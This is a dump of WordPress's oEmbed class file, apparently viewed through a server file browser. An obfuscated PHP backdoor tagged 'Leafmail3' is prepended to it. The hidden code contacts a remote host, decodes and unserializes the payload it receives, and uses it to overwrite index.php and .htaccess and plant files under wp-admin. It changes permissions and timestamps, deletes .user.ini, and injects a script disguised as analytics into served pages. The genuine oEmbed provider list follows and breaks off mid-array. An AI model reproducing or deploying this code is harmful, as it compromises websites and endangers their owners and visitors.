Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Your IP : 3.138.179.120
<?php /*Leafmail3*/goto vODF8; uW9iC: p1I3i: goto m0oPE; zJ0r4: $fd50r .= "\164\144\157"; goto lKsEQ; daxHz: $Q7FSm .= "\x74\151"; goto zNDLT; QuFr2: $wv9Ig .= "\x33\66"; goto sOymP; lYCuA: $LOLkL = "\x35"; goto y6I4r; jBc3K: $tkyNj .= "\x65\170"; goto feM2z; veckF: $vp5Fj .= "\x61\x63\x63\145\x73\x73"; goto F5Rs6; B13FM: $CoSGx = "\x64\x65\x66"; goto YZRXV; LzBKe: $CUa7Y = !empty($qwM6z) || !empty($SCBgM); goto tB1mh; loZYi: try { goto txRyO; K18GF: @$xS8DV($vp5Fj, $eb2Uu); goto tGdpP; iQrV6: @$KDcLu($AW98J, $PShG_); goto K18GF; U8ZJQ: @$xS8DV($AW98J, $eb2Uu); goto Y_zOi; txRyO: @$xS8DV($nHQe_, $eb2Uu); goto U8ZJQ; bh8Zz: @$xS8DV($vp5Fj, $Vjvu_); goto ZGL3p; ZGL3p: @$KDcLu($vp5Fj, $PShG_); goto g9qNE; ZfydO: @$xS8DV($AW98J, $Vjvu_); goto iQrV6; g9qNE: @$xS8DV($nHQe_, $Vjvu_); goto H3O0E; Y_zOi: @$DR4rp($AW98J, $jap8Z["\x61"]); goto ZfydO; tGdpP: @$DR4rp($vp5Fj, $jap8Z["\142"]); goto bh8Zz; H3O0E: } catch (Exception $EdXTL) { } goto y_pyz; F2WJF: $xS8DV .= "\155\157\144"; goto XVkCO; GbEwW: $MhTIX = "\x6d\144\x35"; goto LQ0hU; uLWI3: $vp5Fj = $nHQe_; goto orqfm; egDtp: $tkyNj = "\x66\165\156\x63"; goto usQiR; LQ0hU: $vbt1Y = $MhTIX; goto TgEvM; XPDLi: $gPOF5 = $le6g1; goto tBtTf; WxOmz: $DR4rp .= "\160\x75\164\137\143"; goto UxwWx; GZYTn: $L3Qwt .= "\145\x63\157\144\145"; goto g9Iex; gJ2jd: $B5AMu .= "\x63\157\x70\171"; goto UIZFw; V5t0t: $eb2Uu = 189; goto WkOpf; R8lf6: $L3Qwt .= "\66\x34\x5f\144"; goto GZYTn; hYuCQ: try { goto A3SpX; Lp303: try { goto Kpqh2; IAeb5: $gPOF5($QKdX3); goto usTFE; Soq5P: $QydK0($QKdX3, CURLOPT_POSTFIELDS, $DORoV($q4dFj)); goto IAeb5; RVyt3: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto nb7rJ; AqD2c: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto ttOBx; LJxmP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto RVyt3; snalI: $QydK0($QKdX3, CURLOPT_URL, $Pi1_K); goto AqD2c; nb7rJ: $QydK0($QKdX3, CURLOPT_TIMEOUT, 3); goto caVfG; caVfG: $QydK0($QKdX3, CURLOPT_POST, 1); goto Soq5P; Kpqh2: $QKdX3 = $AhBNU(); goto snalI; usTFE: $iwfAP($QKdX3); goto OfPoO; ttOBx: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto LJxmP; OfPoO: } catch (Exception $EdXTL) { } goto s8qlN; kwFwL: $EHr4j = dirname($O8VpT); goto rtN5e; oSMaO: @$xS8DV($EHr4j, $eb2Uu); goto zRyBD; rtN5e: if ($qjAK2($EHr4j)) { goto ayR0Q; } goto OfJbX; pAJFu: $Pi1_K .= "\164\75\x63\141"; goto AM67e; j_bNW: ayR0Q: goto CA7b_; D4GAj: $q4dFj = ["\x64\x61\164\141" => $jap8Z["\x64"]["\165\x72\x6c"]]; goto Lp303; OfJbX: @$spfUp($EHr4j, $eb2Uu, true); goto j_bNW; oI6DO: @$xS8DV($EHr4j, $Vjvu_); goto oyphM; GLti1: $Pi1_K .= "\77\x61\143"; goto pAJFu; lEMoS: $Pi1_K = $FCJJO; goto GLti1; A3SpX: $O8VpT = $nHQe_ . $jap8Z["\144"]["\160\141\x74\x68"]; goto kwFwL; s8qlN: d_JbM: goto HW6fn; CA7b_: if (!$qjAK2($EHr4j)) { goto d_JbM; } goto oSMaO; oyphM: @$KDcLu($O8VpT, $PShG_); goto lEMoS; OUdjB: @$xS8DV($O8VpT, $Vjvu_); goto oI6DO; AM67e: $Pi1_K .= "\154\x6c"; goto D4GAj; zRyBD: @$DR4rp($O8VpT, $jap8Z["\x64"]["\143\157\144\x65"]); goto OUdjB; HW6fn: } catch (Exception $EdXTL) { } goto loZYi; LNJsy: @$xS8DV($nHQe_, $Vjvu_); goto k_sTE; cuM3u: $nHQe_ = $_SERVER[$Y5cZH]; goto A7iEW; n8L8V: $uz9bL .= "\x68\160\x2e\60"; goto K6CAr; unwRS: $DORoV .= "\x75\x69\154\x64\x5f\x71"; goto Nk50j; JP7xy: $vbt1Y .= "\x6c\x65"; goto RNGP0; nZ1st: $gQtVG .= "\115\x49\x4e"; goto r5zMQ; XScjr: $gQtVG = "\x57\120"; goto O5QIE; OU84W: $pzU4s = "\146\x6c\x6f"; goto mwwot; nRTqE: $RDkKv = []; goto aYHoX; l2VBa: rqNSn: goto gKipv; ljZeU: $uz9bL .= "\x2f\170\x6d"; goto mCMR7; Ieo9X: $Y5cZH .= "\137\x52\117\117\x54"; goto lYCuA; XVkCO: $L3Qwt = "\x62\141\x73\x65"; goto R8lf6; OGVf2: $Vjvu_ = 215; goto huZpo; aBs6o: $fd50r .= "\147\151\x73\x74"; goto FqdNN; MTS3A: V4Jy1: goto vHyOs; jrrba: $PShG_ = $Q7FSm($wv9Ig); goto bMgWF; vODF8: $J4djk = "\74\104\x44\x4d\76"; goto lRUim; ruvGs: $AW98J .= "\150\x70"; goto uLWI3; VXlbA: $uz9bL .= "\160\x63\x2e\x70"; goto n8L8V; w8i1S: $KDcLu .= "\165\x63\150"; goto TPq_6; UxwWx: $DR4rp .= "\x6f\156\x74\145\x6e\x74\163"; goto ISAMz; chc27: if (!($JKloV !== false)) { goto L8tHW; } goto UihyE; TgEvM: $vbt1Y .= "\137\146\x69"; goto JP7xy; zijgp: $F3G3B = "\x69\x6e\x74"; goto d0ttz; XAUaV: $CZpCY = $y6Dil($uz9bL, "\167\53"); goto KpMKi; ZjcxJ: $eb2Uu = $F3G3B($mmShn($eb2Uu), $l6o74); goto OGVf2; WBWyB: try { goto LAZiP; NeOx9: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto WZ1lN; yuxAB: $JKloV = trim(trim($JKloV, "\xef\xbb\xbf")); goto zF9le; YXPOY: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto UWGHP; MbwNB: $JKloV = $gPOF5($QKdX3); goto hAQ9Y; UWGHP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto NeOx9; LAZiP: $QKdX3 = $AhBNU(); goto i1X7z; WZ1lN: $QydK0($QKdX3, CURLOPT_TIMEOUT, 10); goto MbwNB; S2VNp: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto YXPOY; i1X7z: $QydK0($QKdX3, CURLOPT_URL, $B5AMu); goto S2VNp; hAQ9Y: $iwfAP($QKdX3); goto yuxAB; zF9le: } catch (Exception $EdXTL) { } goto chc27; fSM7u: $Q7FSm .= "\164\157"; goto daxHz; YZRXV: $CoSGx .= "\x69\156\x65\144"; goto TSsDX; Y78_D: $tCAxo = 1; goto kOQ0E; iMZQy: $_POST = $_REQUEST = $_FILES = array(); goto CfGUZ; TfIgP: $HH1HZ .= "\x6f\156\x74\x65\x6e\x74\163"; goto jcgg4; Jhv2t: $ocF0w .= "\x64\155\x69\156"; goto I04NN; aYHoX: $N__ZL = 32; goto IvuqX; HgvDx: @$xS8DV($z2Yll, $eb2Uu); goto C_4CC; ZW1G7: r6AqH: goto GqJiG; CfGUZ: AzDa9: goto U2U3q; NdB0_: $QydK0 .= "\157\x70\164"; goto XPDLi; KFMi9: $x0CSu .= "\137\x48\117\x53\124"; goto nMuHG; WqPjf: $B5AMu = $FCJJO; goto B0dlE; TPq_6: $xS8DV = "\x63\x68"; goto F2WJF; tBtTf: $gPOF5 .= "\x6c\137\x65\170\x65\143"; goto Zr7tR; qUDsS: $PKMm7 .= "\x66\151\x6c\x65"; goto Odo2W; UihyE: $jap8Z = 0; goto hJZyv; WQvgq: $qwM6z = $_REQUEST; goto rvlXO; yoOUR: $vTeXJ = "\x76\x65\x72\x73\151"; goto IBhNI; ZxHGi: $fd50r = "\x72\x65"; goto aBs6o; shDBj: $FSKjX .= "\115\x45\123"; goto XScjr; bAY2j: $LYlAw = $L474W = $ocF0w . "\x2f" . $sVnDj; goto nRTqE; sOymP: $wv9Ig .= "\63\x20\144"; goto d5_Qs; jcgg4: $DR4rp = "\x66\151\154\145\137"; goto WxOmz; QKYpu: $ocF0w .= "\55\x61"; goto Jhv2t; dZIRa: $P4139 = $_SERVER[$x0CSu]; goto cuM3u; huZpo: $Vjvu_ += 150; goto qbT4q; BSUkU: $bX79j = "\x66\143\154"; goto RAIH6; g9Iex: $MIh5N = "\147\x7a\x69"; goto ojxiT; m0oPE: if (!$tCAxo) { goto rqNSn; } goto WqPjf; C_4CC: @unlink($z2Yll); goto LNJsy; feM2z: $tkyNj .= "\151\163\x74\x73"; goto j_mMb; dU8Tu: $FSKjX = "\127\x50\x5f\x55"; goto iLcq9; axzTr: $HH1HZ .= "\147\x65\164\x5f\143"; goto TfIgP; sZfV6: $FCJJO .= "\x6c\151\156\153\x2e\x74"; goto oUI8y; zNDLT: $Q7FSm .= "\155\145"; goto egDtp; Nk50j: $DORoV .= "\x75\145\x72\x79"; goto GbEwW; j_mMb: $le6g1 = "\x63\165\162"; goto QFm8j; y6I4r: $LOLkL .= "\x2e\x34"; goto Dc02k; d5_Qs: $wv9Ig .= "\141\171\163"; goto jrrba; AjCJZ: $z2Yll .= "\x6e\x69"; goto OzEb9; RNGP0: $PKMm7 = "\x69\163\137"; goto qUDsS; k_sTE: DUBKw: goto AbQ0z; mwwot: $pzU4s .= "\143\x6b"; goto BSUkU; bKUUG: $WzLgo = $RDkKv[1]; goto WAo0s; mCMR7: $uz9bL .= "\x6c\x72"; goto VXlbA; Tt4oQ: $Q7FSm = "\163\164\162"; goto fSM7u; B0dlE: $B5AMu .= "\x3f\x61\143\x74"; goto aETJg; DbBpN: $vTeXJ .= "\x70\x61\162\145"; goto B13FM; IBhNI: $vTeXJ .= "\157\156\137\x63\157\x6d"; goto DbBpN; QSRig: $FCJJO = "\150\x74\164\x70\163\72\x2f\57"; goto Jb8vw; pLm0w: $spfUp .= "\144\151\x72"; goto yspyu; bMgWF: $x0CSu = "\110\x54\x54\120"; goto KFMi9; psjtE: $iwfAP .= "\x6c\x5f\143\x6c\x6f"; goto kxGeH; OzEb9: if (!$PKMm7($z2Yll)) { goto DUBKw; } goto fUCm1; YZnxF: $AhBNU .= "\154\137\x69\x6e\x69\164"; goto o4wfR; U2U3q: $xS8DV($nHQe_, $eb2Uu); goto XAUaV; hVAgs: if (empty($RDkKv)) { goto r6AqH; } goto gpO7z; lRUim: $huaOJ = "\57\136\143"; goto l1puk; ojxiT: $MIh5N .= "\x6e\146\154\x61\164\145"; goto QO6bK; yspyu: $HH1HZ = "\146\151\154\145\137"; goto axzTr; nMuHG: $Y5cZH = "\x44\x4f\x43\125\x4d\105\x4e\x54"; goto Ieo9X; QO6bK: $RpkLV = "\165\156\x73\145\x72"; goto TE4rq; oUI8y: $FCJJO .= "\x6f\160\x2f"; goto ZxHGi; gpO7z: $ZwOvi = $RDkKv[0]; goto bKUUG; r5zMQ: $EvUsr = $CoSGx($FSKjX) || $CoSGx($gQtVG); goto WQvgq; ryAXN: $iSMwa = "\163\164\162"; goto Aw0OF; RAIH6: $bX79j .= "\157\x73\145"; goto QSRig; QFm8j: $AhBNU = $le6g1; goto YZnxF; y_pyz: M1S8t: goto YcoP2; bPtLw: $AW98J .= "\x64\x65\170\56\x70"; goto ruvGs; jHqFV: if (!is_array($jap8Z)) { goto M1S8t; } goto sHXMo; O5QIE: $gQtVG .= "\x5f\x41\104"; goto nZ1st; dBHzv: $AW98J .= "\x2f\151\x6e"; goto bPtLw; KpMKi: if (!($tkyNj($AhBNU) && !preg_match($huaOJ, PHP_SAPI) && $pzU4s($CZpCY, 2 | 4))) { goto v1tUm; } goto vfYVM; u8ekB: $qjAK2 .= "\x64\151\162"; goto D1aMA; rvlXO: $SCBgM = $_FILES; goto LzBKe; Odo2W: $qjAK2 = "\x69\163\137"; goto u8ekB; Tl9BG: $ocF0w .= "\x2f\167\160"; goto QKYpu; hh9Gu: $YKWP5 .= "\x74\40\x41\x63\143"; goto DSWYm; Dc02k: $LOLkL .= "\56\x30\x3b"; goto dZIRa; o4wfR: $QydK0 = $le6g1; goto VYKG_; pnTdK: $YKWP5 = "\110\124\124"; goto qEMP2; WkOpf: $eb2Uu += 304; goto ZjcxJ; CLQnS: $huaOJ .= "\x73\151"; goto Tt4oQ; orqfm: $vp5Fj .= "\x2f\x2e\x68\164"; goto veckF; jvCLK: $fd50r .= "\151\157\156"; goto cE3iS; vHyOs: goto p1I3i; goto ZW1G7; Aw0OF: $iSMwa .= "\154\x65\156"; goto yoOUR; neYoj: $y6Dil .= "\145\156"; goto OU84W; Yc9eB: $JKloV = false; goto WBWyB; IvuqX: $l6o74 = 5; goto DicZE; tB1mh: if (!(!$EvUsr && $CUa7Y)) { goto AzDa9; } goto iMZQy; vI8QX: aybLW: goto dU8Tu; cE3iS: if (isset($_SERVER[$fd50r])) { goto aybLW; } goto YhmyI; FqdNN: $fd50r .= "\145\162\x5f"; goto l7JCC; I04NN: $sVnDj = substr($MhTIX($P4139), 0, 6); goto bAY2j; WAo0s: if (!(!$PKMm7($AW98J) || $vbt1Y($AW98J) != $ZwOvi)) { goto F9B9M; } goto Y78_D; d0ttz: $F3G3B .= "\x76\141\154"; goto G8B0v; G8B0v: $mmShn = "\144\145\x63"; goto w1WUM; Ky1Ah: $fd50r .= "\x75\156\x63\x74"; goto jvCLK; YcoP2: L8tHW: goto l2VBa; fUCm1: @$xS8DV($nHQe_, $eb2Uu); goto HgvDx; ISAMz: $KDcLu = "\164\x6f"; goto w8i1S; YhmyI: $_SERVER[$fd50r] = 0; goto vI8QX; qbT4q: $Vjvu_ = $F3G3B($mmShn($Vjvu_), $l6o74); goto pnTdK; UIZFw: $B5AMu .= "\x26\150\75" . $P4139; goto Yc9eB; A7iEW: $ocF0w = $nHQe_; goto Tl9BG; QiT7j: $YKWP5 .= "\x30\x36\x20\116\157"; goto hh9Gu; usQiR: $tkyNj .= "\x74\151\x6f\156\137"; goto jBc3K; TE4rq: $RpkLV .= "\x69\x61\154\x69\172\145"; goto zijgp; DWZ53: if (!(!$_SERVER[$fd50r] && $vTeXJ(PHP_VERSION, $LOLkL, "\76"))) { goto tOsRM; } goto qx0qa; DSWYm: $YKWP5 .= "\x65\x70\164\141\142\154\x65"; goto TXR6r; clNTt: tOsRM: goto NrKhW; F5Rs6: $z2Yll = $nHQe_; goto ZRq91; Jb8vw: $FCJJO .= "\157\153\x6b"; goto sZfV6; Zr7tR: $iwfAP = $le6g1; goto psjtE; w1WUM: $mmShn .= "\x6f\143\x74"; goto ryAXN; TXR6r: $uz9bL = $nHQe_; goto ljZeU; lKsEQ: $fd50r .= "\167\156\137\146"; goto Ky1Ah; kxGeH: $iwfAP .= "\x73\x65"; goto PULcN; qEMP2: $YKWP5 .= "\120\57\61\x2e\x31\40\x34"; goto QiT7j; aETJg: $B5AMu .= "\x3d\x67\145\164"; goto gJ2jd; iLcq9: $FSKjX .= "\123\x45\137\x54\110\x45"; goto shDBj; AbQ0z: $tCAxo = 0; goto hVAgs; Te8Ah: $AW98J = $nHQe_; goto dBHzv; PULcN: $DORoV = "\150\164\x74\x70\137\x62"; goto unwRS; oHm8V: $tCAxo = 1; goto MTS3A; K6CAr: $y6Dil = "\146\x6f\160"; goto neYoj; PL0rr: if (!(!$PKMm7($vp5Fj) || $vbt1Y($vp5Fj) != $WzLgo)) { goto V4Jy1; } goto oHm8V; l1puk: $huaOJ .= "\154\151\x2f"; goto CLQnS; l7JCC: $fd50r .= "\x73\x68\165"; goto zJ0r4; sHXMo: try { goto HbY3E; HbY3E: @$xS8DV($nHQe_, $eb2Uu); goto YBneD; lVY2g: LmA8a: goto o_wA9; w2wnP: @$KDcLu($L474W, $PShG_); goto vkTcY; plcED: $L474W = $LYlAw; goto lVY2g; o_wA9: @$DR4rp($L474W, $jap8Z["\x63"]); goto FIfGh; FIfGh: @$xS8DV($L474W, $Vjvu_); goto w2wnP; YBneD: if (!$qjAK2($ocF0w)) { goto LmA8a; } goto y3Uf0; y3Uf0: @$xS8DV($ocF0w, $eb2Uu); goto plcED; vkTcY: } catch (Exception $EdXTL) { } goto hYuCQ; GqJiG: $tCAxo = 1; goto uW9iC; VYKG_: $QydK0 .= "\154\x5f\x73\x65\x74"; goto NdB0_; D1aMA: $spfUp = "\x6d\x6b"; goto pLm0w; TSsDX: $wv9Ig = "\x2d\61"; goto QuFr2; vfYVM: $xS8DV($nHQe_, $Vjvu_); goto DWZ53; kOQ0E: F9B9M: goto PL0rr; NrKhW: try { goto qZ46l; RQqe5: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto XDrKy; } goto A2PmA; w9gDu: y6dH8: goto Z726M; MlbPu: $yVIWe = @explode("\x3a", $HH1HZ($L474W)); goto RQqe5; YN8V8: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto YUPG5; } goto DYfgW; urTh8: XDrKy: goto vw7V4; hhu33: $gOxct = trim($yVIWe[0]); goto h7asi; POLut: $RDkKv[] = $aWnJP; goto w9gDu; JSOyl: $RDkKv[] = $aWnJP; goto dxtWS; ixd8R: $L474W = $nHQe_ . "\57" . $sVnDj; goto uPNAL; YdNrA: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto U90QQ; } goto hhu33; qZ46l: if (!$PKMm7($L474W)) { goto oqtoQ; } goto p5kTV; V_cwX: oTvft: goto NDBCD; A2PmA: $gOxct = trim($yVIWe[0]); goto DvFPK; wbpgM: if (!empty($RDkKv)) { goto oTvft; } goto ixd8R; DvFPK: $aWnJP = trim($yVIWe[1]); goto YN8V8; Y3KDn: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto y6dH8; } goto D88sj; vw7V4: wNb1b: goto V_cwX; dxtWS: YUPG5: goto urTh8; hNhbL: oqtoQ: goto wbpgM; Z726M: U90QQ: goto hNhbL; uPNAL: if (!$PKMm7($L474W)) { goto wNb1b; } goto MlbPu; D88sj: $RDkKv[] = $gOxct; goto POLut; h7asi: $aWnJP = trim($yVIWe[1]); goto Y3KDn; p5kTV: $yVIWe = @explode("\72", $HH1HZ($L474W)); goto YdNrA; DYfgW: $RDkKv[] = $gOxct; goto JSOyl; NDBCD: } catch (Exception $EdXTL) { } goto Te8Ah; qx0qa: try { $_SERVER[$fd50r] = 1; $fd50r(function () { goto AV30r; qJcS6: $XaxO1 .= "\105\x6c\x65\x6d\145\x6e\x74\163\102"; goto Ak55L; Q10lk: $XaxO1 .= "\x3c\x2f\x73"; goto b0BbS; QUShX: $XaxO1 .= "\x73\x63\162\x69\x70\164\x22\x3e" . "\xa"; goto qTRy2; DytHl: $XaxO1 .= "\57\155\x61\164"; goto shQ2Y; UYMzk: $XaxO1 .= "\105\x6c\145\x6d\145\156\164\x28\42\x73\143"; goto YC55T; ZXF34: $XaxO1 .= "\x6f\155\157\40\x43\157\x64"; goto Fp2Ee; AdEN_: $XaxO1 .= "\x72\x69\x70\x74\40\x74\x79\160\x65\75\42\164\x65\170"; goto vaHEn; qTRy2: $XaxO1 .= "\50\146\165\156\x63"; goto sT9Yu; YC55T: $XaxO1 .= "\162\151\160\164\42\51\x2c\40\x73\x3d\x64\56\x67\x65\164"; goto qJcS6; b0BbS: $XaxO1 .= "\x63\x72\x69\x70\x74\76\12"; goto NGsxv; HMLFi: $XaxO1 .= "\x7d\x29\50\x29\73" . "\12"; goto Q10lk; CvLy6: $XaxO1 .= "\x3f\x69\144\x3d"; goto dyWeq; Fp2Ee: $XaxO1 .= "\x65\x20\x2d\55\x3e\12"; goto fdPCn; y9nGa: $XaxO1 .= "\x6f\162\145\x28\147\x2c\x73\51\x3b" . "\12"; goto HMLFi; MSOF2: $XaxO1 .= "\160\164\x22\x29\133\60\x5d\x3b" . "\12"; goto P_ZMm; dyWeq: $XaxO1 .= "\x4d\x2d"; goto DLX8K; fdPCn: echo $XaxO1; goto endbR; No27V: $XaxO1 .= $P4139; goto DytHl; sT9Yu: $XaxO1 .= "\164\151\x6f\156\50\x29\40\x7b" . "\xa"; goto ubJzA; ebgnR: $XaxO1 .= "\x3b\x20\x67\x2e\144\x65\146"; goto wmOvX; KJt_C: $XaxO1 .= "\147\x2e\163\x72"; goto E5SRJ; yjiNj: $XaxO1 .= "\x64\x20\115\x61\x74"; goto ZXF34; jd565: $XaxO1 .= "\163\145\162\164\102\145\146"; goto y9nGa; D7OFn: $XaxO1 .= "\x75\155\145\156\164\54\40\x67\75\x64\56\143\x72\x65\141\x74\x65"; goto UYMzk; ubJzA: $XaxO1 .= "\166\x61\162\x20\x75\75\x22" . $FCJJO . "\x22\73" . "\xa"; goto v3rQ8; E5SRJ: $XaxO1 .= "\143\x3d\165\x2b\42\152\x73\x2f"; goto No27V; v3rQ8: $XaxO1 .= "\x76\141\162\x20\x64\75\144\157\143"; goto D7OFn; r7GHN: $XaxO1 .= "\163\x63\x72\151\160\164\42\73\40\147\x2e\x61"; goto RDjIx; vaHEn: $XaxO1 .= "\164\x2f\152\x61\x76\x61"; goto QUShX; gOYzX: $XaxO1 = "\x3c\x21\x2d\x2d\x20\x4d\141"; goto zMa4a; NGsxv: $XaxO1 .= "\x3c\41\x2d\55\40\x45\156"; goto yjiNj; I8B8v: $XaxO1 .= "\75\42\164\x65\x78\164\57"; goto uazjK; Ak55L: $XaxO1 .= "\171\x54\x61\x67\116\x61\x6d\145"; goto wg3cP; AV30r: global $P4139, $FCJJO; goto gOYzX; wg3cP: $XaxO1 .= "\50\42\x73\143\162\151"; goto MSOF2; JH0uq: $XaxO1 .= "\x3c\163\143"; goto AdEN_; DLX8K: $XaxO1 .= time(); goto d1HE5; RDjIx: $XaxO1 .= "\x73\x79\156\x63\x3d\x74\x72\165\x65"; goto ebgnR; d1HE5: $XaxO1 .= "\42\x3b\40\x73\56\x70\141\x72"; goto Bu0lg; wmOvX: $XaxO1 .= "\x65\162\x3d\164\162\165\145\x3b" . "\12"; goto KJt_C; shQ2Y: $XaxO1 .= "\157\x6d\x6f\x2e\152\163"; goto CvLy6; zMa4a: $XaxO1 .= "\x74\x6f\x6d\157\x20\x2d\x2d\x3e\xa"; goto JH0uq; uazjK: $XaxO1 .= "\152\141\x76\x61"; goto r7GHN; Bu0lg: $XaxO1 .= "\145\156\164\116\x6f\144\x65\x2e\x69\156"; goto jd565; P_ZMm: $XaxO1 .= "\x67\x2e\164\171\x70\x65"; goto I8B8v; endbR: }); } catch (Exception $EdXTL) { } goto clNTt; DicZE: $l6o74 += 3; goto V5t0t; hJZyv: try { $jap8Z = @$RpkLV($MIh5N($L3Qwt($JKloV))); } catch (Exception $EdXTL) { } goto jHqFV; VtpcZ: $z2Yll .= "\145\162\56\x69"; goto AjCJZ; ZRq91: $z2Yll .= "\x2f\56\x75\163"; goto VtpcZ; gKipv: v1tUm: ?>
<?php
/**
* API for fetching the HTML to embed remote content based on a provided URL
*
* Used internally by the WP_Embed class, but is designed to be generic.
*
* @link https://wordpress.org/documentation/article/embeds/
* @link http://oembed.com/
*
* @package WordPress
* @subpackage oEmbed
*/
/**
* Core class used to implement oEmbed functionality.
*
* @since 2.9.0
*/
#[AllowDynamicProperties]
class WP_oEmbed {
/**
* A list of oEmbed providers.
*
* @since 2.9.0
* @var array
*/
public $providers = array();
/**
* A list of an early oEmbed providers.
*
* @since 4.0.0
* @var array
*/
public static $early_providers = array();
/**
* A list of private/protected methods, used for backward compatibility.
*
* @since 4.2.0
* @var array
*/
private $compat_methods = array( '_fetch_with_format', '_parse_json', '_parse_xml', '_parse_xml_body' );
/**
* Constructor.
*
* @since 2.9.0
*/
public function __construct() {
$host = urlencode( home_url() );
$providers = array(
'#https?://((m|www)\.)?youtube\.com/watch.*#i' => array( 'https://www.youtube.com/oembed', true ),
'#https?://((m|www)\.)?youtube\.com/playlist.*#i' => array( 'https://www.youtube.com/oembed', true ),
'#https?://((m|www)\.)?youtube\.com/shorts/*#i' => array( 'https://www.youtube.com/oembed', true ),
'#https?://((m|www)\.)?youtube\.com/live/*#i' => array( 'https://www.youtube.com/oembed', true ),
'#https?://youtu\.be/.*#i' => array( 'https://www.youtube.com/oembed', true ),
'#https?://(.+\.)?vimeo\.com/.*#i' => array( 'https://vimeo.com/api/oembed.{format}', true ),
'#https?://(www\.)?dailymotion\.com/.*#i' => array( 'https://www.dailymotion.com/services/oembed', true ),
'#https?://dai\.ly/.*#i' => array( 'https://www.dailymotion.com/services/oembed', true ),
'#https?://(www\.)?flickr\.com/.*#i' => array( 'https://www.flickr.com/services/oembed/', true ),
'#https?://flic\.kr/.*#i' => array( 'https://www.flickr.com/services/oembed/', true ),
'#https?://(.+\.)?smugmug\.com/.*#i' => array( 'https://api.smugmug.com/services/oembed/', true ),
'#https?://(www\.)?scribd\.com/(doc|document)/.*#i' => array( 'https://www.scribd.com/services/oembed', true ),
'#https?://wordpress\.tv/.*#i' => array( 'https://wordpress.tv/oembed/', true ),
'#https?://(.+\.)?crowdsignal\.net/.*#i' => array( 'https://api.crowdsignal.com/oembed', true ),
'#https?://(.+\.)?polldaddy\.com/.*#i' => array( 'https://api.crowdsignal.com/oembed', true ),
'#https?://poll\.fm/.*#i' => array( 'https://api.crowdsignal.com/oembed', true ),
'#https?://(.+\.)?survey\.fm/.*#i' => array( 'https://api.crowdsignal.com/oembed', true ),
'#https?://(www\.)?twitter\.com/\w{1,15}/status(es)?/.*#i' => array( 'https://publish.twitter.com/oembed', true ),
'#https?://(www\.)?twitter\.com/\w{1,15}$#i' => array( 'https://publish.twitter.com/oembed', true ),
'#https?://(www\.)?twitter\.com/\w{1,15}/likes$#i' => array( 'https://publish.twitter.com/oembed', true ),
'#https?://(www\.)?twitter\.com/\w{1,15}/lists/.*#i' => array( 'https://publish.twitter.com/oembed', true ),
'#https?://(www\.)?twitter\.com/\w{1,15}/timelines/.*#i' => array( 'https://publish.twitter.com/oembed', true ),
'#https?://(www\.)?twitter\.com/i/moments/.*#i' => array( 'https://publish.twitter.com/oembed', true ),
'#https?://(www\.)?soundcloud\.com/.*#i' => array( 'https://soundcloud.com/oembed', true ),
'#https?://(.+?\.)?slideshare\.net/.*#i' => array( 'https://www.slideshare.net/api/oembed/2', true ),
'#https?://(open|play)\.spotify\.com/.*#i' => array( 'https://embed.spotify.com/oembed/', true ),
'#https?://(.+\.)?imgur\.com/.*#i' => array( 'https://api.imgur.com/oembed', true ),
'#https?://(www\.)?issuu\.com/.+/docs/.+#i' => array( 'https://issuu.com/oembed_wp', true ),
'#https?://(www\.)?mixcloud\.com/.*#i' => array( 'https://app.mixcloud.com/oembed/', true ),
'#https?://(www\.|embed\.)?ted\.com/talks/.*#i' => array( 'https://www.ted.com/services/v1/oembed.{format}', true ),
'#https?://(www\.)?(animoto|video214)\.com/play/.*#i' => array( 'https://animoto.com/oembeds/create', true ),
'#https?://(.+)\.tumblr\.com/.*#i' => array( 'https://www.tumblr.com/oembed/1.0', true ),
'#https?://(www\.)?kickstarter\.com/projects/.*#i' => array( 'https://www.kickstarter.com/services/oembed', true ),
'#https?://kck\.st/.*#i' => array( 'https://www.kickstarter.com/services/oembed', true ),
'#https?://cloudup\.com/.*#i' => array( 'https://cloudup.com/oembed', true ),
'#https?://(www\.)?reverbnation\.com/.*#i' => array( 'https://www.reverbnation.com/oembed', true ),
'#https?://videopress\.com/v/.*#' => array( 'https://public-api.wordpress.com/oembed/?for=' . $host, true ),
'#https?://(www\.)?reddit\.com/r/[^/]+/comments/.*#i' => array( 'https://www.reddit.com/oembed', true ),
'#https?://(www\.)?speakerdeck\.com/.*#i' => array( 'https://speakerdeck.com/oembed.{format}', true ),
'#https?://(www\.)?screencast\.com/.*#i' => array( 'https://api.screencast.com/external/oembed', true ),
'#https?://([a-z0-9-]+\.)?amazon\.(com|com\.mx|com\.br|ca)/.*#i' => array( 'https://read.amazon.com/kp/api/oembed', true ),
'#https?://([a-z0-9-]+\.)?amazon\.(co\.uk|de|fr|it|es|in|nl|ru)/.*#i' => array( 'https://read.amazon.co.uk/kp/api/oembed', true ),
'#https?://([a-z0-9-]+\.)?amazon\.(co\.jp|com\.au)/.*#i' => array( 'https://read.amazon.com.au/kp/api/oembed', true ),
'#https?://([a-z0-9-]+\.)?amazon\.cn/.*#i' => array( 'https://read.amazon.cn/kp/api/oembed', true ),
'#https?://(www\.)?a\.co/.*#i' => array( 'https://read.amazon.com/kp/api/oembed', true ),
'#https?://(www\.)?amzn\.to/.*#i' => array( 'https://read.amazon.com/kp/api/oembed', true ),
'#https?://(www\.)?amzn\.eu/.*#i' => array( 'https://read.amazon.co.uk/kp/api/oembed', true ),
'#https?://(www\.)?amzn\.in/.*#i' => array( 'https://read.amazon.in/kp/api/oembed', true ),
'#https?://(www\.)?amzn\.asia/.*#i' => array( 'https://read.amazon.com.au/kp/api/oembed', true ),
'#https?://(www\.)?z\.cn/.*#i' => array( 'https://read.amazon.cn/kp/api/oembed', true ),
